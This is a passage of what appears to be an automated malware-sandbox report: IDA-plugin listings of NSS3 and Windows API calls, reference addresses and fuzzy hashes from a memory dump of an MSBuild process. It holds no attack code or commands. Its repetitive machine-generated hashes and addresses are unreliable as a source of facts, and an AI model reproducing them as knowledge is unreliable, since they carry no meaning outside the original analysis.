                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$ErrorK11_memset
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(-00000007), ref: 6C69660F
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • free.MOZGLUE(00000000), ref: 6C696660
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C69667B
                                                                                        • SGN_DecodeDigestInfo.NSS3(?), ref: 6C69669B
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C6966B0
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6966C8
                                                                                          • Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
                                                                                          • Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
                                                                                          • Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
                                                                                          • Part of subcall function 6C6C25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
                                                                                          • Part of subcall function 6C6C25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
                                                                                          • Part of subcall function 6C6C25D0: PR_Unlock.NSS3(?), ref: 6C6C274D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C682D1A), ref: 6C692E7E
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PR_Now.NSS3 ref: 6C692EDF
                                                                                        • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C692EE9
                                                                                        • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C682D1A), ref: 6C692F01
                                                                                        • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C682D1A), ref: 6C692F50
                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C692F81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C68AEB3
                                                                                        • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C68AECA
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C68AEDD
                                                                                        • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C68AF02
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C7A9500), ref: 6C68AF23
                                                                                          • Part of subcall function 6C6DF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6DF0C8
                                                                                          • Part of subcall function 6C6DF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6DF122
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C68AF37
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                        • String ID:
                                                                                        • API String ID: 3714604333-0
                                                                                        • Opcode ID: 051f13771990ad61cfad898278f0ab4407dba077c95d01a1301c02063ba528e8
                                                                                        • Instruction ID: a98154fc65ce94d7985c49088787675719ea4145fb0c898d1f7e4dc896f7e0d8
                                                                                        • Opcode Fuzzy Hash: 051f13771990ad61cfad898278f0ab4407dba077c95d01a1301c02063ba528e8
                                                                                        • Instruction Fuzzy Hash: C02129B290A200ABEB108F189C41B9A7BE4AF8572CF144719FC549B7D2F731D54587BB
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70EE85
                                                                                        • realloc.MOZGLUE(9DAE394A,?), ref: 6C70EEAE
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C70EEC5
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • htonl.WSOCK32(?), ref: 6C70EEE3
                                                                                        • htonl.WSOCK32(00000000,?), ref: 6C70EEED
                                                                                        • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C70EF01
                                                                                        Similarity
                                                                                        • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                        • String ID:
                                                                                        • API String ID: 1351805024-0
                                                                                        • Opcode ID: 0444e237ce765a7635604f4e3bed7d7bfbca8d35d5b076707e9ee9737992d3ea
                                                                                        • Instruction ID: 5ef3818e08906be1f584c0c18873a01a248051863720fe83d3ba362715857001
                                                                                        • Opcode Fuzzy Hash: 0444e237ce765a7635604f4e3bed7d7bfbca8d35d5b076707e9ee9737992d3ea
                                                                                        • Instruction Fuzzy Hash: C621E171A0021C9BDB109F28DE8469AB7E8EF49358F148179EC489B741E730EC04CBE2
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C6E2576
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6E2585
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6C6E25A1
                                                                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6C6E25AF
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E25BB
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E25CA
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3520324648-0
                                                                                        • Opcode ID: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
                                                                                        • Instruction ID: 2fb1201073eb942f8ff2dba71ca76ed2c7a72d8c66c1a9fa3b9ead77a9c5c1c8
                                                                                        • Opcode Fuzzy Hash: 50e65796174ee478bc0e949d594a75a1eee7aa7d86a47d09df32777f9d9d5031
                                                                                        • Instruction Fuzzy Hash: 3C01D2B170A2127BFF1027659C19E37375EEB457A6B100131BD19C5681ED60D8008AF5
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: free$Value$CriticalDeleteSection
                                                                                        • String ID:
                                                                                        • API String ID: 195087141-0
                                                                                        • Opcode ID: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
                                                                                        • Instruction ID: 716e50720754ef74767aa73eaf008c587baff73b95787657ec012776d61fd420
                                                                                        • Opcode Fuzzy Hash: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
                                                                                        • Instruction Fuzzy Hash: 6D112E74604B508BCB10BF7AC44955EBFF4BF45749F454A6DD8CA87A00EB34A094CB96
                                                                                        APIs
                                                                                        • PR_EnterMonitor.NSS3(00000000,?,?,6C697F5D,00000000,00000000,?,?,?,6C6980DD), ref: 6C68E532
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490AB
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490C9
                                                                                          • Part of subcall function 6C749090: EnterCriticalSection.KERNEL32 ref: 6C7490E5
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749116
                                                                                          • Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C74913F
                                                                                        • PR_EnterMonitor.NSS3(6C6980DD), ref: 6C68E549
                                                                                          • Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C7491AA
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749212
                                                                                          • Part of subcall function 6C749090: _PR_MD_WAIT_CV.NSS3 ref: 6C74926B
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C68E56D
                                                                                        • PL_HashTableDestroy.NSS3 ref: 6C68E57B
                                                                                          • Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(?,?,6C68E175), ref: 6C68E19C
                                                                                          • Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(6C68E175), ref: 6C68E1AA
                                                                                          • Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E208
                                                                                          • Part of subcall function 6C68E190: PL_HashTableRemove.NSS3(?), ref: 6C68E219
                                                                                          • Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E231
                                                                                          • Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E249
                                                                                          • Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E257
                                                                                        • PR_ExitMonitor.NSS3(6C6980DD), ref: 6C68E5B5
                                                                                        • PR_DestroyMonitor.NSS3 ref: 6C68E5C3
                                                                                        Similarity
                                                                                        • API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
                                                                                        • String ID:
                                                                                        • API String ID: 3740585915-0
                                                                                        • Opcode ID: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
                                                                                        • Instruction ID: cc87d72c2d08b110838d3890f40ed1a5b6b369141b3eae7fade93b42af39c4e2
                                                                                        • Opcode Fuzzy Hash: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
                                                                                        • Instruction Fuzzy Hash: 1D0180B6E11280CBEF805B68DA09EA13BB8F71B74CF041036D81481A61FF325658FB96
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E53A
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E5BC
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 632333372-598938438
                                                                                        • Opcode ID: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
                                                                                        • Instruction ID: 40de20b1201bbcecb85e9b8327db6a9ece0476573a9f03a38a29879cdc724e72
                                                                                        • Opcode Fuzzy Hash: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
                                                                                        • Instruction Fuzzy Hash: 2E3146317007255BC3168EA9C9819ABB3A0EB41314B540D7DE888B7B81F372E945C7E8
                                                                                        APIs
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E36
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F6E57
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E7D
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6EAA
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: IntervalMilliseconds$ErrorValue
                                                                                        • String ID: nyl
                                                                                        • API String ID: 3163584228-467026884
                                                                                        • Opcode ID: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
                                                                                        • Instruction ID: 41af5cfaca3f9e4d94bc31b9e29f5fba0e587043b64ddb54881efeb2829e9ad9
                                                                                        • Opcode Fuzzy Hash: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
                                                                                        • Instruction Fuzzy Hash: 7231F533618612EFDB145F34DD08396BBA6AB0531AF10063CD4AAD2A40EB31E85BCF85
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686456
                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686476
                                                                                        • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C685DEF,?,?,?), ref: 6C6864A0
                                                                                        • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C6864C2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CertificateError$DestroyTemp
                                                                                        • String ID: ]hl
                                                                                        • API String ID: 3886907618-2786816073
                                                                                        • Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                        • Instruction ID: 0a19c55f07475f3a17e5cef6362d2306877db278b1eca2095ab66b842cacf706
                                                                                        • Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                        • Instruction Fuzzy Hash: AB21E7B1A122016BEB209E68DC09BAB76E9EF40318F148538F51AC6B41E7B2D558C7B5
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000008,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D459B
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • TlsGetValue.KERNEL32(?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45BF
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45D3
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
                                                                                        • String ID: Ozll
                                                                                        APIs
                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C670BDE), ref: 6C670DCB
                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,?,6C670BDE), ref: 6C670DEA
                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C670BDE), ref: 6C670DFC
                                                                                        • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C670BDE), ref: 6C670E32
                                                                                        Strings
                                                                                        • %s incr => %d (find lib), xrefs: 6C670E2D
                                                                                        Similarity
                                                                                        • API ID: strrchr$Print_stricmp
                                                                                        • String ID: %s incr => %d (find lib)
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetFunctionList), ref: 6C6B2538
                                                                                        • PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6C6B2551
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                        • String ID: ppFunctionList = 0x%p$C_GetFunctionList$nyl
                                                                                        APIs
                                                                                        • PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC2D
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                          • Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                          • Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                          • Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC44
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC59
                                                                                        • free.MOZGLUE(8CB6FF01,6C706AC6,?,?,?,?,?,?,?,?,?,?,6C715D40,00000000,?,6C71AAD4), ref: 6C72AC62
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                        • String ID: @]ql
                                                                                        APIs
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC5C7
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC603
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC636
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6CC6D7
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6CC6E1
                                                                                        Similarity
                                                                                        • API ID: K11_$DoesMechanism$Free
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 6C613C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C613C66
                                                                                          • Part of subcall function 6C613C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C613D04
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C626DC0
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C626DE5
                                                                                          • Part of subcall function 6C628010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62807D
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6280D1
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62810E
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C628140
                                                                                        • memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C626E7E
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C626E96
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C626EC2
                                                                                          • Part of subcall function 6C627D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C627E27
                                                                                          • Part of subcall function 6C627D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C627E67
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ulong$memcpy$_byteswap_ushort
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C7B7379,00000002,?), ref: 6C712493
                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7124B4
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124EA
                                                                                        • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124F5
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C7B7379,00000002,?), ref: 6C7124FE
                                                                                        Similarity
                                                                                        • API ID: Error$Alloc_FreeK11_Utilfree
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Value$IdentitiesLayermemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2311246771-0
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C67EDFD
                                                                                        • calloc.MOZGLUE(00000001,00000000), ref: 6C67EE64
                                                                                        • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C67EECC
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C67EEEB
                                                                                        • free.MOZGLUE(?), ref: 6C67EEF6
                                                                                        Similarity
                                                                                        • API ID: ErrorValuecallocfreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3833505462-0
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C79A55C
                                                                                        • PR_IntervalNow.NSS3 ref: 6C79A573
                                                                                        • PR_IntervalNow.NSS3 ref: 6C79A5A5
                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C79A603
                                                                                          • Part of subcall function 6C749890: TlsGetValue.KERNEL32(?,?,?,6C7497EB), ref: 6C74989E
                                                                                        • _PR_MD_UNLOCK.NSS3(?), ref: 6C79A636
                                                                                        Similarity
                                                                                        • API ID: Interval$CriticalEnterSectionValue
                                                                                        • String ID:
                                                                                        • API String ID: 959321092-0
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3 ref: 6C6844FF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C684524
                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C684537
